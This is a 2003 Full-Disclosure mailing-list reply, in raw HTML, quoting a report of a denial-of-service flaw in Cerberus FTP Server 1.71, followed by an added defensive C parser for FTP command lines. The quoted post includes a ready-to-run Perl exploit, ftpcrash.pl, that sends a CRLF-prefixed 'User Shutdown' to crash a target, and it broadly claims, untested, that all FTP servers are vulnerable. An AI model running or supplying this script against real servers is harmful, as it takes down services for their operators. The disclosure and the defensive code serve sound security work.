
RE: [Full-Disclosure] FTPServer Denial Of Service Vulnerability



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2722.900" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>hi 
there,</FONT></SPAN></DIV>
<DIV><SPAN class=250051804-20082003><FONT face=Arial color=#0000ff size=2>no 
binaries please! the source code is enough....</FONT></SPAN></DIV>
<BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px">
  <DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma 
  size=2>-----Original Message-----<BR><B>From:</B> 
  full-disclosure-admin@lists.netsys.com 
  [mailto:full-disclosure-admin@lists.netsys.com]<B>On Behalf Of </B>Florian 
  Rock<BR><B>Sent:</B> Monday, August 18, 2003 6:34 PM<BR><B>To:</B> 
  vuln@secunia.com; full-disclosure@lists.netsys.com<BR><B>Subject:</B> 
  [Full-Disclosure] FTPServer Denial Of Service 
  Vulnerability<BR><BR></FONT></DIV>
  <DIV><FONT face=Arial size=2>I</FONT><FONT face=Arial size=2>&nbsp;have found 
  a very serious hole in FTPServer<BR>The exploit is tested on Cerberus FTP 
  Server 1.71 and on one I coded myself, but I think all FTP servers are 
  vulnerable</FONT></DIV>
  <DIV><FONT face=Arial size=2>Sorry, but I have too few FTP servers to 
  test</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>And this is how it works:<BR>Typical 
  request:<BR>00000000&nbsp; 55 73 65 72 20 53&nbsp; 68 75 74 64 6f 77 6e 0d 
  0a&nbsp;&nbsp;&nbsp; User Shutdown..</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>Exploit request:<BR>00000000&nbsp; 0d 0a 55 73 65 
  72 20 53&nbsp; 68 75 74 64 6f 77 6e&nbsp;&nbsp;&nbsp; ..User 
  Shutdown</FONT></DIV>
  <DIV>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>I've coded an exploit:<BR>See attached file: 
  ftpcrash.exe (zipped) for people who have no Perl</FONT></DIV>
  <DIV><FONT face=Arial color=#0000ff size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>My exploit (in 
  perl):<BR>[code]<BR>-ftpcrash.pl-<BR>print "Exploit for 
  FTP-Server\n";<BR>print "&nbsp;&nbsp; by The real Remoter\n";<BR>my $usage = 
  "\nftpcrash &lt;IP&gt; &lt;Port&gt;\n";<BR>die "$usage" unless $ARGV[0] 
  &amp;&amp; $ARGV[1];<BR>use Socket;<BR>my $remote = $ARGV[0];<BR>my $port = 
  $ARGV[1];<BR>my $iaddr = inet_aton($remote);<BR>my $proto = 
  getprotobyname("tcp");<BR>my $paddr = sockaddr_in($port, 
  $iaddr);<BR>socket(SOCK, PF_INET, SOCK_STREAM, $proto);<BR>connect(SOCK, 
  $paddr) or die "Can't connect to " . $remote;<BR>print "Sending 
  exploit\n";<BR>$msg = "\x0d\x0a";<BR>$msg = $msg . "User 
  Shutdown";<BR>send(SOCK,$msg, 0) or die "Can't send 
  Exploit";<BR>sleep(1);<BR>print "Server 
  Crashed!";<BR>sleep(1);<BR>exit;<BR>[/code]</FONT></DIV>
  <DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
  <DIV><FONT face=Arial size=2>Sorry for my bad English (I'm German)</FONT><FONT 
  face=Arial size=2><FONT size=1></DIV></BLOCKQUOTE></FONT></FONT></BODY></HTML>
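
A defensive reading of the two requests shown in the message above, as an added example that is not part of the original posts and is not code from Cerberus FTP Server. The message does not state the root cause, so this assumes the crash comes from the command reader mishandling the leading empty line and the unterminated command after it; the function name, return codes and the 512-byte cap are assumptions.

```c
#include <ctype.h>
#include <string.h>

#define FTP_MAX_LINE 512   /* assumed cap on one control-channel line */

enum ftp_line { FTP_NEED_MORE, FTP_EMPTY, FTP_COMMAND, FTP_TOO_LONG };

/*
 * Extract at most one line from buf[0..len), the bytes received so far on the
 * control connection. *used is set to the number of bytes the caller should
 * drop from the front of buf. On FTP_COMMAND, verb holds the upper-cased
 * command word and arg its argument; over-long fields are truncated to fit.
 * verbsz and argsz must be at least 1.
 */
enum ftp_line ftp_next_line(const char *buf, size_t len, size_t *used,
                            char *verb, size_t verbsz, char *arg, size_t argsz)
{
    size_t eol = 0, i, n;

    *used = 0;
    verb[0] = arg[0] = '\0';
    while (eol < len && buf[eol] != '\n')
        eol++;
    if (eol == len) {                     /* no line terminator received yet */
        if (len <= FTP_MAX_LINE)
            return FTP_NEED_MORE;         /* keep the bytes, wait for more */
        *used = len;                      /* unbounded line: discard it */
        return FTP_TOO_LONG;
    }
    *used = eol + 1;                      /* consume through the LF */
    if (eol > 0 && buf[eol - 1] == '\r')  /* strip the CR of CRLF */
        eol--;
    if (eol > FTP_MAX_LINE)
        return FTP_TOO_LONG;
    if (eol == 0 || buf[0] == ' ')        /* bare CRLF or no command word */
        return FTP_EMPTY;
    for (i = 0; i < eol && buf[i] != ' '; i++)
        ;                                 /* i = length of the command word */
    n = i < verbsz - 1 ? i : verbsz - 1;
    for (size_t k = 0; k < n; k++)
        verb[k] = (char)toupper((unsigned char)buf[k]);
    verb[n] = '\0';
    if (i < eol)
        i++;                              /* skip the separating space */
    n = eol - i < argsz - 1 ? eol - i : argsz - 1;
    memcpy(arg, buf + i, n);
    arg[n] = '\0';
    return FTP_COMMAND;
}
```

Fed the second request from the post, the first call reports an empty line and consumes two bytes, and the next call reports that the remaining 13 bytes are an incomplete line, so nothing is handed to the command dispatcher.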
